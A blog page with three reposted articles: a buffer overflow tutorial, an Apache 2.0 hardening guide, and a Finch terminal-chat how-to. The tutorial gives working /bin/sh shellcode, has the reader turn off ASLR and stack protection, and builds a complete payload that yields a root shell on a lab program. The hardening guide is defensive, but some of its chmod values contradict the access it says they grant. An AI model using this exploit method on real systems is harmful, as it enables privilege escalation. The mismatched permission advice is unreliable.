IT_Solution for Learning

Programmers always need to be careful when writing applications for the security of their software. Every application is vulnerable in some form, and code is always looked over. Buffer overflows are one of the most popular attacks on any application, due to the increased chance of this vulnerability being overlooked in the author’s code. Along with being popular, buffer overflow attacks are very dangerous in a system security aspect. Attackers exploiting the vulnerability can execute arbitrary code aimed to gain root privileges to the system.

Buffers, also called arrays in C/C++, are contiguous blocks of memory for storing a specific data type. An example of a buffer is shown here:

CODE

char buffer[512];

A storage type of char is assigned to the newly declared array called referred to as buffer, now has 512 bytes of allocated storage space. However, there is an issue that can arise when a buffer reaches and leaps over it's specified storage limit unchecked. This problem is what we call a buffer overflow, when blocks of memory are overwritten as a result of passing space limits. In a *nix environment, as a buffer overflow occurs we are confronted with something known as a segmentation fault, segfault for short. Segmentation faults occur when an application tries to overwrite system memory in an incorrect fashion, possibly to locations that are read-only. On a Windows OS, these errors are displayed differently with a STATUS_ACCESS_VIOLATION exception.

The most important thing to remember about buffer overflow vulnerabilities are that when successfully exploited followed by the spawn of a shell, the shell can only take the permission level of the application that was exploited. Basically, the only way to obtain root authentication on a system through a buffer overflow vulnerability is if the application being exploited is run by the root account, such as a system service. The main part to exploiting a buffer overflow vulnerability successfully is the code to be executed, also known as shellcode, or opcode. Opcodes, short for operation codes, are specific instructions to the processor, usually in machine code format. For simplicities' sake, I will not be showing you how to create your own shellcode from scratch, at least not in this specific article. I will be using sample shellcode provided by milw0rm for a simple shell spawn.

Machine code is system dependent, meaning that this shellcode is only designed to work with *nix x86 environments. If the provided shellcode doesn't work for you, take a look around on milw0rm, or any site that provides shellcode matching your system architecture.
CODE

\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80

The 22 byte shellcode presented is a set of instructions to execute a shell on the system. As said before, the shell that is spawned only gains the permissions that the application is currently running on.

The second most important part of a successful exploitation is the NOP sled. NOP’s are a machine instruction which stands for No-OPeration, all of which are skipped over by the processor until the next set of instructions are reached, basically like a stream following in one direction towards the bigger water source, or the rest of the instructions to be given. NOP’s take the form of the “\x90” hexadecimally represented opcode, and are usually required for buffer overflow exploitations. A grouping of NOP’s used in a buffer overflow attack is called a NOP sled, the name relating to the flow of the application. If a return address is set to any of the NOP’s in the group, the program flows downward until it reaches something else to execute.

An exception to the NOP sled requirement is through the usage of environment variables. System wide environment variables can be viewed through the env command. The difference of the shellcode and filename can then be calculated to find the exact location of the shellcode stored in the specified environment variable. However, this method will not be showed in detail by this article.

Last but not least, garbage data and a correct return address are required to complete a buffer overflow exploit. Garbage data is any sort of data to fill the rest of the buffer, it doesn't matter what it is as long as it is not a null byte, thus ending the string. A return address is used by the Instruction Pointer register, also known as the EIP. The EIP tells the processor which memory address to begin execution next, When a buffer is overflowed, the 4 byte EIP is written over by some of the garbage data. The EIP always points to the next instruction to be executed, which is very rewarding for us; now that we have the power to overwrite it.

Before we start, we need to change a security setting in Linux, which randomizes address space. This setting is required to be changed for basic buffer overflows, more advanced overflows can get around this safety precaution. In bash, enter the following command:

CODE

echo 0 > /proc/sys/kernel/randomize_va_space

That’s all you need to change to make this basic buffer overflow work.

Now that we know how all this works, how about we put it to good use? Let’s use this piece of vulnerable code just as an example:

vuln.c
CODE

#include

#include

#include



int copy(char *string){

char buffer[1024];

strcpy(buffer, string);

return 1;

}



int main(int argc, char *argv[]) {

copy(argv[1]);

return 1;

}

Note, if you are using Ubuntu as your OS, when compiling you must use these arguments for GCC:
CODE

-fno-stack-protector -z execstack

The first disables stack protection, the second allows the stack to be executed.

This code is not too complicated, I’m only going to stay basic with this article. In this example we have a 1024 byte buffer, with the very insecure copy() function shown above. This function uses the strcpy() function included in the string.h header, which if gone unchecked, will forcibly copy any size string from source to destination. As you have probably figured, this is not good at all, allowing anyone to overflow the buffer array. Let's get started with this simple vulnerability.

Here is the format in which you need to sort your shellcode, garbage data, and return address:
CODE

[ GARBAGE DATA ] -> [ NOP ] -> [ SHELLCODE ] -> [ RET ]

We now need to calculate the amount needed for each field, excluding the return address which is always 4 bytes.

Our buffer size is 1024 bytes, so we need to find out how much garbage data we’re going to need. Just for safe measure we’re going to use 150 NOP’s, so if we are off on the return address, we have a higher chance of hitting the sled.

1024 - 150 = 874

The example shellcode is 22 bytes.

874 - 22 = 852

The EIP needs to be overwritten so we are going to add 4 bytes.

852 + 4 = 856

Before we get started writing statements to exploit this application, I want to point this out:
CODE

delusion@deLusive:~/code/overflow$ ls -l
total 16

-rwxr-xr-x 1 root root 11997 2009-04-12 13:03 vuln

-rw-r--r-- 1 root root 212 2009-04-12 13:03 vuln.c

The owner of the file is root, so this application will be running with root privileges, simulating the effect of a real-world service being attacked by a buffer overflow exploit.

Moving onto the actual exploitation, we now know how much garbage data we’re going to use to fill most of the buffer. Let’s write a quick perl statement to do this all for us in GDB, standing for the GNU DeBugger.

CODE

perl –e’print “A”x856,”\x90”x150,”\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80”,”YYYY”’

Now we’re ready to use GDB to debug this. I set YYYY as the return address temporarily for debugging purposes.

CODE

delusion@deLusive:~/code/overflow$ gdb vuln -q
(gdb) run `perl -e'print "A"x856,"\x90"x150, "\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","YYYY"'`
Starting program: /home/delusion/code/overflow/vuln `perl -e'print "A"x856,"\x90"x150, "\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","YYYY"'`

Program received signal SIGSEGV, Segmentation fault.
0x59595959 in ?? ()

You might have been able to spot something all ready. 0x59 is hex for Y, which is what has corrupted the EIP. Let’s take a look at the registers.

CODE

(gdb) i r
eax 0x1 1
ecx 0xbfffeb38 -1073747144
edx 0x409 1033
ebx 0xb7fc1ff4 -1208213516
esp 0xbfffef40 0xbfffef40
ebp 0x80cde189 0x80cde189
esi 0xb8000ce0 -1207956256
edi 0x0 0
eip 0x59595959 0x59595959


As you see, the EIP was overwritten with 4 bytes of ‘Y’, now we need to find out the general location of the NOP sled to get an approximate return address.

CODE
(gdb) x/200xb $esp
……
0xbffff4b8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff4c0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff4c8: 0x41 0x41 0x41 0x90 0x90 0x90 0x90 0x90
0xbffff4d0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff4d8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff4e0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff4e8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff4f0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff4f8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff500: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff508: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff510: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff518: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff520: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff528: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff530: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff538: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff540: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff548: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff550: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff558: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff560: 0x90 0xb0 0x0b 0x99 0x52 0x68 0x2f 0x2f
0xbffff568: 0x73 0x68 0x68 0x2f 0x62 0x69 0x6e 0x89
0xbffff570: 0xe3 0x52 0x53 0x89 0xe1 0xcd 0x80 0x59
0xbffff578: 0x59 0x59 0x59 0x00 0x43 0x50 0x4c 0x55


Notice where the NOP’s end. The first byte of data after is 0xb0, the beginning of our shellcode. The best thing to do is to get a return address to use towards the middle; I’ll use 0xbffff4f0 for this example. The x86 architecture is in Little-Endian format, which is always a good thing to remember. This means that the least significant bytes are read first, so you need to reverse that memory address. Your return address is now going to be:

CODE
\xf0\xf4\xff\xbf


Now you are all set and ready to go to initiate this attack on the vulnerable application.

CODE
(gdb) run `perl -e'print "A"x856,"\x90"x150, "\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\xf0\xf4\xff\xbf"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/delusion/code/overflow/vuln `perl -e'print "A"x856,"\x90"x150, "\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\xf0\xf4\xff\xbf"'`
Executing new program: /bin/bash
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
sh-3.1# whoami
root
sh-3.1# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),17(au
dio),18(video),19(cdrom),26(tape),83(plugdev)
sh-3.1#

Now that wasn’t too hard, was it?


reference:r00tsecurity...

Technical Reference: Apache 2.0 DMZ Secure Server Install
Overview

This document is a guide to installing and hardening an Apache 2.0 web server to common security standards. It will guide you through practical measures to harden your Apache server, by way of example.



Because a web server is often placed at the edge of the network, it is one of the most vulnerable services to attack. Therefore, it’s vital that you follow this guide to ensure that:



1) The opportunity to compromise the web server is limited

2) Should the web server be compromised, the damage potential to the rest of the network, data, and systems is limited.
1. Prepare the host operating system


1.1 Install and secure the host operating system.



Follow the hardening guidelines in the The Center for Internet Security. Hardening the host O/S ensures that, should someone compromise the security of your web server, the amount of damage that they could inflict will be minimized.



1.2 Create the directories to hold the Apache files



It’s important to separate the binaries /bin, docs (/htdocs), and logs (/logs) into separate partitions on the system. You can choose whatever root you want, but this example will use /opt/apache2 as the root directory for the Apache web server.



1.3 Create the host groups for administering and running the server.



Create a distinct group for all the users who will have permission to change the configuration, start, and stop the web server. For example, if you want to call the group “webadmin”, create it like this:



# groupadd webadmin



Create a distinct group for the web server user – no one will actually log into this group, but it will only be used to hold the userid which will run the web server. For example, if you want to call that group “webserv”, create it like this:


# groupadd webserv



Take note that you should not create a “web developer” group on this host. Since this is a hardened production host you must not provide web developers login accounts on this system. Instead, developers should deploy documents and code to the server using your code/content deployment system, such as Kintana’s Apps*Integrity.


1.4 Create an unprivileged host user id to run the server.



Never run the web server as root; if the web server is ever compromised, the attacker will have complete control over the system. Instead, the best way to reduce your exposure to attack when running a web server is to create a unique unprivileged userid for the server application. The userid nobody is often used for this purpose, but a userid and group that are unique to the web server is a more secure solution.

By default the web server uses privileged ports (port 80 and 443) and, when configured for secure operation, must have root privileges to open its log files and start the dæmon. (Therefore, the web server daemon will have to be started as “root”, unless you configure it to use a port higher than 1024.) Once the server's startup tasks are complete, all active instances can run as the unprivileged user.

Use the following command line entries as patterns for creating a group and user for the web server. Here’s an example if you were to use “webserv” as the user:

# useradd -d /opt/apache2/htdocs -g webserv -c "Web Server" webserv
1.5 Lock down the web server account



It’s important that no one can successfully execute a password guessing attack against this account, so in this step, we’ll restrict this account so that no one can log into it.



1.5.1 Issue this command to lock the password for the web server account:



# passwd –l webserv



Password changed.



1.5.2 To be sure the account is locked, issue the command:



# grep webserv /etc/shadow



…a :!: at the beginning of the line indicates that the password is locked.



1.5.3 Issue this command to remove the shell for this account:



# usermod –s /bin/false webserv



1.5.4 To be sure the account is locked, issue the command:



# grep webserv /etc/passwd



…/bin/false at the end of the line indicates that the shell is set to a non-existent shell.



1.5.5 Test the web server account to be sure you can’t login. Issue this command to try to log in:



> login webserv


2. Download and verify Apache source code



By default, web servers return information about the product and version they are running in the Server variable of the HTTP header. This information can be very useful to hackers, enabling them to target attacks to that specific server. To prevent that information from being returned from the web server, this step shows you how to modify that header and build your own copy of the web server.



Because web servers often host sensitive information, or allow users to log in with plain-text passwords, it’s important to encrypt the HTTP traffic. Therefore, this section will show you how to configure mod_ssl on your web server.



Note: Don’t build the web server on your production, hardened host. Build it on a staging or development server (with identical O/S), and then copy it to your production host.



These steps will guide you through downloading Apache source code, validating it, compiling it, and installing it. We don’t recommend use of pre-compiled or DSO versions. DSO versions may allow a hacker to introduce new “features” without having to recompile the code.



If you intend to add other module to your Apache web server installation, repeat the validation steps below for each module you add.


2.1 Download the latest version of Apache 2.0



Ensure that you retrieve the latest copy, so that you have cumulative bug fixes and security patches. You can download it from the Apache site.



From here, download four files:



1) The Apache source code itself, called something like httpd-2.0.45.tar.gz.

2) The PGP keys for the Apache signers: a file named “KEYS”

3) The PGP key for this source distribution, called something like httpd-2.0.45.tar.gz.asc

4) The MD5 checksum for this source distribution, called something like httpd-2.0.45.tar.gz.md5



wget http://www.apache.org/dist/httpd/httpd-2.0.45.tar.gz

wget http://www.apache.org/dist/httpd/KEYS

wget http://www.apache.org/dist/httpd/httpd-2.0.45.tar.gz.asc

wget http://www.apache.org/dist/httpd/httpd-2.0.45.tar.gz.md5


2.2 Verify PGP signature for the Apache source



To ensure that you have an authentic version from the Apache Group, and that it’s not been tampered with (remember, there are many mirrors from which you can download the Apache source), you should check the PGP signature. If you don’t have PGP installed on this server, you can validate these files on another machine.



a) If you don’t already have them in your PGP keyring, import the public keys from the Apache Group into your keyring:



~> pgp –ka KEYS



b) Check the PGP signature:



~> pgp httpd_2.0.45.tar.gz



…if the signature is correct, you should get something similar to this:



-- CUT --

File 'httpd-2.0.45.tar.gz.asc' has signature, but with no text.

Text is assumed to be in file 'httpd-2.0.45.tar.gz'.

Good signature from user "Justin R. Erenkrantz ".

Signature made 2003/03/31 07:49 GMT



WARNING: Because this public key is not certified with a trusted signature, it is not known with high confidence that this public key actually belongs to: "Justin R. Erenkrantz ".



The fact that it says, “Good Signature from…” is what we’re looking for here. The WARNING statement indicates that we’ve not verified this signature with a 3rd party, which is ok here.



2.3 Verify the MD5 checksum for the Apache source.



MD5 is a way to validate the integrity of the file itself, much more reliable than checksum and similar methods. Normally, mismatches in the MD5 checksum from the Apache source are the result of download errors or file corruption. If you don’t have MD5 on your system, you can download it from here.



Compare the results of these two commands – visually inspect them to ensure they match (if they don’t, download it again):



~> pwd

/usr/local/build



~> cat httpd-2.0.45.tar.gz.md5

MD5 (httpd-2.0.45.tar.gz) = 1f33e9a2e2de06da190230fa72738d75



~> md5 apache_1.3.27.tar.gz

MD5 (httpd-2.0.45.tar.gz) = 1f33e9a2e2de06da190230fa72738d75



2.4 Extract the zipped Apache source file.



Finally, you need to unzip and untar the source file.



~> /pwd

/usr/local/build



~> tar xvfz httpd-2.0.45.tar.gz



This will create a new directory under your current one, named “httpd-2.0.45”.
3. Create SSL certificates



SSL support requires an SSL library on your system, such as OpenSSL. If you’re not sure how to find and install it, look at the Apache 1.3 hardening guide. This section will walk you through configuring your SSL certificate for encrypting your HTTP traffic. It will help you build a validated certificate and install it on your web server. We’ll add the configured certificates to the Apache configuration in the next step.


3.1 Create a key and certificate request for your web server



Using OpenSSL, the following command will create a 1024-bit private key named, “private.key” and generate a certificate signing request (CSR). You need to have the CSR signed by a Certificate Authority (CA) who can validate your identity. When prompted to input information, note the answers in bold print below. (Answer the prompts with the information relevant for your server, of course).



Note: If you provide a challenge password, you will be unable to start the web server unattended. We don’t recommend providing a challenge password, just leave it blank.



~> pwd

/usr/local/build



~> openssl req -nodes -newkey rsa:1024 -keyout /usr/local/build/server.key -out /usr/local/build/server.crt



Using configuration from /usr/share/ssl/openssl.cnf

Generating a 1024 bit RSA private key

................++++++

.......++++++

writing new private key to 'server.key'

-----

You are about to be asked to enter information that will be incorporated into your certificate request.

What you are about to enter is what is called a Distinguished Name or a DN.

There are quite a few fields but you can leave some blank

For some fields there will be a default value,

If you enter '.', the field will be left blank.

-----

Country Name (2 letter code) [AU]:US

State or Province Name (full name) [Some-State]:NC

Locality Name (eg, city) []:RTP

Organization Name (eg, company):XianCo Systems, Inc.

Organizational Unit Name (eg, section) []:InfoSec

Common Name (eg, YOUR name) []:xianshield.xianco.com

Email Address []:webmaster@xianshield.xianco.com



Please enter the following 'extra' attributes

to be sent with your certificate request

A challenge password []:

An optional company name []:



Most importantly, make sure your “Common Name” above matches the DNS name of your server. The locale information is less important, but we think it’s best to use the locality of the server itself.


3.2. Submit CSR for validation/signing by a CA.



Next, you need to submit your CSR for signing by a CA. This will eliminate the “warning dialog” that a browser will pop up when a user accesses your site. This is because the user’s browser has a set of trusted CAs that will prevent you from being notified if the web server’s site certificate is signed by a CA you’ve trusted in your browser already (such as Verisign or DST). In this example, we will submit the request to your company’s CA for signing. (You can use another CA if you want).



Send your request for a certificate to the CA. Include your name, your web server (Apache, in this case) your OS, and of course, the .csr (certificate signing request).


3.3 Rename your certificate files

The names aren’t important, they just have to match what’s in conf/ssl.conf. You will receive 2 files from the PKI team. The first file will be your server certificate (and will probably be named .cer), the 2nd file is the certificate chain. Here, we’ll rename them to fit what’s specified in conf/ssl.conf.



mv “XianCo CA (01-03).cer” ca.crt

mv xianshield.cer server.crt


3.4 Copy certificates to your server.



Since you received these certs via email, and they’re now sitting on your laptop, we need to copy both server.crt and ca.crt to the server. We’ll copy them up to /usr/local/build. We’ll move them both to the appropriate locations under conf/ssl.conf later.



scp *.crt xianshield:/usr/local/build/.




4. Configure and build the Apache Server


In this section, we’ll configure Apache with SSL and mod_ldap support. As of Apache V2, these are both included modules, and don’t require a separate download.

In order to customize Apache to the extent necessary, we need to download the source for the latest version of Apache. Once that’s complete, we’ll configure and test it.


4.1 Alter the Apache version



We want to remove/modify the default HTTP response header parameter for the “Server:” token to hide the identity of our web server. (You’d be surprised how many vulnerability scanners are looking for specific versions of Apache.) To do this, we must open a header file (httpd.h) prior to compiling the server. To do this, edit the ap_release.h file located in ${ApacheSrcDir}/include



~> pwd

/usr/local/build/httpd-2.0.45/include



~> vi ap_release.h

…



#define AP_SERVER_BASEVENDOR "Apache Software Foundation" ß Change this…

#define AP_SERVER_BASEPRODUCT "Apache" ß and this



These are the lines you want to change; change these to remove references to Apache. We’ll hide the actual version using the ServerTokens directive in the httpd.conf file.



Example:



#define SERVER_BASEVENDOR "Network Services"

#define SERVER_BASEPRODUCT "Networks, Inc."


4.2 Configure Apache software for compilation



There are a few standard modules that should be disabled when you set up the Apache web server.
Modules to disable

Generally, the following modules make it easier to configure/support your web server but also give too much information to attackers. We recommend that you disable the following default modules for your production server:



* info: gives out too much information about your web server to potential attackers.

* status: gives out server stats via web pages

* autoindex: provides directory listings when no index.html file is present

* imap: provides server-side mapping of index files

* include: provides server-side includes (.shtml files)

* userdir: translates URLs to user-specific directories

* auth: you won’t need it – you’ll set up authentication against LDAP via mod_ldap
Modules to enable

Here are two modules that will provide strong authentication and encryption for your web server. If you have any protected content on your web server, it’s important that you only allow your users to access it over SSL, otherwise your user passwords will be sent in clear text, subject to snooping.



* ssl: Encrypts the traffic from the browser to the web server – an important means of protecting login passwords and sensitive data.

* auth_ldap: Allows you to validate passwords against ldap.xianco.com or other LDAP.
A word about LDAP authentication

It’s important that you don’t set up your own userid/password store, since it propagates passwords into insecure locations. Instead, you should modify your configuration to defer authentication to a central store, such as a centrally maintained LDAP. To authenticate against an LDAP store, you need to compile Apache with support. In order to use mod_ldap, you’ll need LDAP libraries installed on your system. You can use OpenLDAP or Netscape Directory SDK for the LDAP client libraries.
Configuration commands

Here’s how to configure Apache with these options:



~> pwd



/usr/local/build/httpd-2.0.45



~> sudo ./configure –-prefix=/opt/apache2 \

--enable-so \

--enable-ssl \

--with-ldap \

--enable-ldap \

--enable-auth-ldap \

--disable-info \

--disable-status \

--disable-autoindex \

--disable-imap \

--disable-include \

--disable-userdir \

--disable-auth



checking for chosen layout... Apache

checking for working mkdir -p... yes

checking build system type... sparc64-unknown-linux-gnu

checking host system type... sparc64-unknown-linux-gnu

checking target system type... sparc64-unknown-linux-gnu



Configuring Apache Portable Runtime library ...

…

4.3 Compile the Apache server



Now that the software is validated and configured, it’s time to compile it. Since you won’t have a compiler on your production host, we’ll compile and install it on a separate server, then tar/compress it and scp it to your production host. You’ll need to run make using “sudo” so that Apache knows it can use ports < 1000.



~> pwd

/usr/local/build/httpd-2.0.45



~> sudo make

===> src

make[1]: Entering directory `/usr/local/build/httpd-2.0.45'

make[2]: Entering directory `/usr/local/build/httpd-2.0.45/src'

===> src/regex

sh ./mkh -p regcomp.c >regcomp.ih

…


4.4 Install the Apache server

If you have followed our instructions for securing the host, you will have to unpack the distribution and compile it on a separate host. To make your server more secure, use a separate disk partition for your web content. Create a unique mount point for this directory -- htdocs is a good name to use, but make it somewhere outside the ServerRoot directory. You'll need to update /etc/vfstab to mount this partition as part of your server's startup process.

Do not use the htdocs directory included in the distribution as your DocumentRoot. This directory contains user documentation that you don't want to make available to the public as it contains information a potential attacker could use to penetrate your system. (The attacker can deduce what kind of web server you’re running, and hone his attack accordingly.) Move these documentation files into your support directory so the webmasters for your site can refer to them as needed.

You’ll need to install the Apache server using “sudo” privileges or as root.



~> pwd

/usr/local/build/httpd-2.0.45



~> sudo make install

===> [mktree: Creating Apache installation tree]

./src/helpers/mkdir.sh /opt/apache2/bin

./src/helpers/mkdir.sh /opt/apache2/libexec

./src/helpers/mkdir.sh /opt/apache2/man/man1

./src/helpers/mkdir.sh /opt/apache2/man/man8

./src/helpers/mkdir.sh /opt/apache2/conf

..
5. Install SSL certificates

Now that the server is installed, we need to copy certificate key, server certificate, and CA chain to Apache’s configuration directory.


5.1 Set up the Apache certificate directories



~> pwd

/opt/apache2/conf



~> sudo mkdir ssl.crt ssl.key


5.2 Copy the certificate and key to the SSL configuration directory



~> sudo cp /usr/local/build/server.crt ./ssl.crt/.

~> sudo cp /usr/local/build/server.key ./ssl.key/.


6. Configure the Apache server



Configure the file permissions and runtime settings of the Apache server. It’s important that you place your htdocs, cgi-bin, and logs directories on separately mounted filesystems.

6.1 Configure httpd.conf



Set the following in your httpd.conf file. You can also download an example httpd.conf with these settings here.


Directive and setting

Description/rationale

ServerSignature Off


Prevents server from giving version info on error pages.

ServerTokens Prod


Prevents server from giving version info in HTTP headers

Listen 80 (remove)


Remove the “Listen” directive – we’ll set this directive only in ssl.conf, so that it will only be available over https.

User webserv (or whatever you created in step 2 above)


Ensure that the child processes run as unprivileged user

Group webserv (or whatever you created in step 2 above)


Ensure that the child processes run as unprivileged group

ErrorDocument 404 errors/404.html

ErrorDocument 500 errors/500.html

etc.


To further obfuscate the web server and version, this will redirect to a page that you should create, rather than using the default Apache pages.

ServerAdmin -webmaster@xianco.com


Use a mail alias – never use a person’s email address here.

UserDir disabled root


Remove the UserDir line, since we disabled this module. If you do enable user directories, you’ll need this line to protect root’s files.



Order Deny, Allow

deny from all




Deny access to the root file system.





deny from all





Options -FollowSymLinks -Includes -Indexes -MultiViews

AllowOverride None

Order allow,deny

Allow from all




LimitExcept prevents TRACE from allowing attackers to find a path through cache or proxy servers.



The “-“ before any directive disables that option.



FollowSymLinks allows a user to navigate outside the doc tree, and Indexes will reveal the contents of any directory in your doc tree.



Includes allows .shtml pages, which use server-side includes (potentially allowing access to the host). If you really need SSI, use IncludesNoExec instead.



AllowOverride None will prevent developers from overriding these specifications in other parts of the doc tree.

AddIcon (remove)

IndexOptions (remove)

AddDescription (remove)

ReadmeName (remove)

HeaderName (remove)

IndexIgnore (remove)


Remove all references to these directives, since we disabled the fancy indexing module.

Alias /manual (remove)


Don’t provide any accessible references to the Apache manual, it gives attackers too much info about your server.



You should familiarize yourself with the following parameters. Unless you are running a high-volume web site, you can safely leave the settings at their default values. If you are running a high-volume web site, you’ll want to adjust these directives upward to better withstand denial-of-service attacks.



* StartServers

* MinSpareServers

* MaxSpareServers

* Timeout

* Keepalive

* MaxKeepAliveRequests

* KeepAliveTimeout

* MaxClients

* MaxRequestsPerChild


6.2 Configure ssl.conf



Set the following in your ssl.conf file. You can also download an example ssl.conf with these settings here.


Directive and setting

Description/rationale

SSLCertificateChainFile /opt/apache2/conf/ssl.crt/ca.crt


(Find this line and uncomment it). This points to the Certificate Authority file for your chained certificate.


6.3 Remove default Apache files



It’s important to remove default files such as .html files and CGI scripts (yes, even the Apache manual). This will help obfuscate the server you’re running, targetted attacks against your web server. You’ll probably want to build a simple index.html page to place in the htdocs directory, just so you know the web server is working when you start it.



~> sudo rm –fr /opt/apache2/htdocs/*

~> sudo rm –fr /opt/apache2/cgi-bin/*

~> sudo rm –fr /opt/apache2/icons



To test that your web server is running, you can now place this file in your htdocs directory – it’s just a simple index.html file. Make sure you set the permissions to world-readable.


6.4 Set directory and file permissions for the server



To protect the directories on your server, it’s important that you protect the directories themselves.



* bin is where the executable portion of the Apache web server is. It should be readable/executable only by members of the webadmin group, but only writable by root.



~> sudo chown –R root:webadmin /opt/apache2/bin

~> sudo chmod –R 770 /opt/apache2/bin



* conf is where your web server configuration files are and needs to be read/writable only by the webadmin group.



~> sudo chown –R root:webadmin /opt/apache2/conf

~> sudo chmod –R 770 /opt/apache2/conf



* logs is where your access and error logs will go. It should be readable only by the webadmin group.



~> sudo chown –R root:webadmin /opt/apache2/logs

~> sudo chmod –R 755 /opt/apache2/logs



* htdocs is where your HTML files are and needs to be world readable, but writable only by root (you should copy content in from a staging server).



~> sudo chown –R root /opt/apache2/htdocs

~> sudo chmod –R 775 /opt/apache2/htdocs



* cgi-bin is where your executable scripts are and needs to be world read/executable, but writable only by root (you should copy content in from a staging server).



~> sudo chown –R root /opt/apache2/cgi-bin

~> sudo chmod –R 775 /opt/apache2/cgi-bin


7. Make final configuration and start server

Lastly, we need to modify the startup configuration for Apache and restart the server.


7.1 Modify Apache startup script so that it will notify you when it’s restarted.



As a failsafe measure, you should notify your webmaster alias any time this server is restarted. That way, you’ll be notified of any unauthorized attempt.



Open /opt/apache/bin/apachectl and add something like this to the file:



tail /opt/apache2/logs/error_log |

/bin/mail -s 'Apache web server has restarted' -webmaster@xianco.com



7.2 Test your configuration by starting the server



sudo /opt/apache2/bin/apachectl startssl


7.3 Keep your web server patched



Check web sites for Apache and all modules regularly and apply important patches.



Apache web server: http://nagoya.apache.org/dist/httpd/patches/



OpenSSL: http://www.openssl.org/source



OpenLDAP: http://www.openldap.org/


8. Configure authentication against an LDAP directory.



In this final section, we’ll configure the Apache httpd.conf file so that resources are authenticated against an LDAP server. This step really can’t be run until you’ve installed the web server. Once you’ve got your web server installed, just add the LDAP authentication directives to any directory (or httpd.conf file) where you want password protection with CEC credentials. Here’s an example of protecting a directory named “Internal”





AuthName CEC

AuthType Basic

AuthLDAPURL ldap://ldap.xianco.com:389/ou=employees,ou=people,o=xianco.com?uid?sub?(objectclass=xiancoPerson)

require valid-user

• Stumble This!
• Mark as Delicious!
• Bookmark on Facebook!
• Tweet This!

For those who have starts getting in love with Terminal Console in Ubuntu, you may love to be able to do everything from the Terminal console. Even if I previously said, I've already bored with the terminal coz I see it every day...
it is good to know that actually, your terminal can do almost everything you wanna do in your linux box. I just don't like the way it looks and feel because I love art and graphics. I like the eye catchy graphics and also the live cubic desktop effect and so on. Anyway, I would like to share on how to use your Pidgin from terminal console.


I have a lot to say about situations where you only got your terminal console to use programs in linux. But lets keep it short and go straight to the point now. The program to enable you to use Pidgin via Terminal console is called Finch. Finch as in the manual is "A Pimpin’ Penguin console frontend to libpurple Instant Messaging client."

Run this command on your terminal to install finch in Ubuntu:

$ sudo apt-get install finch

After installation, you can now use your Pidgin from the terminal console by running this command on your terminal:

$ finch

As you wish to use terminal, you should already aware that you can't use your mouse (too bad for mousey... LOL). So, you have to be ready with keyboard shortcuts to use this application. Here is the quick list of useful keyboard shortcut to be use within Finch (taken from 'man finch'):

Finch: GNT Shortcut

Shortcut Description
Alt + a Bring up a list of available actions. You can use this list to access the accounts window, plugins window, preference window etc.
Alt + n Go to the next window.
Alt + p Go to the previous window.
Alt + w Show the list of windows. You can select and jump to any window from the list.
Alt + c Close the current window.
Alt + q Quit.
Alt + m Start moving a window. Press the cursor keys to move the window. When you are done, press Enter or Escape.
Alt + r Start resizing a window. Press the cursor keys to resize the window. When you are done, press Enter or Escape.
Alt + d Dump the contents of the screen in HTML format in a file named "dump.html" in working directory.
Alt + . Move the position of the current window in the window list one place to the right.
Alt + , Move the position of the current window in the window list one place to the left.
Alt + l Refresh the windows. This is useful after resizing the terminal window.
Alt + 1 2 ... 0 Jump to the 1st, 2nd ... 10th window.
Ctrl + o Bring up the menu (if there is one) for a window. Note that currently only the buddylist has a menu.
Alt + / Show a list of available key-bindings for the current widget in focus.
Alt + > Switch to the next workspace
Alt + < Switch to the previous workspace
Alt + t Tag (or untag) the current window
Alt + T Attached all the tag windows to the current workspace
Alt + s Show the workspace list
F9 Create a new workspace and switch to it



You may now grab your terminal, try and feel it for yourself. For more information, you may simply call "man finch" and read them. That's all for now mate, Enjoy Ubuntu!!


reference: http://coderstalk.blogspot.com/2008/09/finch-howto-use-pidgin-via-terminal.html

